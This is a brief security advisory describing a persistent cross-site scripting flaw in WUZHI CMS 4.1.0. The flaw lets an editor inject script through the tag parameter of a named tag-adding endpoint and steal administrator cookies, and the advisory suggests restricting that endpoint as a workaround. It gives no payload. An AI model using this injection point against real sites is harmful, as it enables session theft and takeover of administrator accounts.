Cass203

Name of the Vulnerable Software and Affected Versions: WUZHI CMS version 4.1.0 Description: A persistent XSS issue allows stealing administrator cookies via the `tag` parameter in the "index.php?m=tags&f=index&v=add&& su=wuzhicms" API endpoint. This can be exploited by a website editor with lower privileges than the administrator, who can add new tags with an XSS payload after logging in. Recommendations: For WUZHI CMS version 4.1.0, as a temporary workaround, consider restricting access to the "index.php?m=tags&f=index&v=add&& su=wuzhicms" API endpoint to prevent adding new tags with malicious payloads. Avoid using the `tag` parameter in this endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.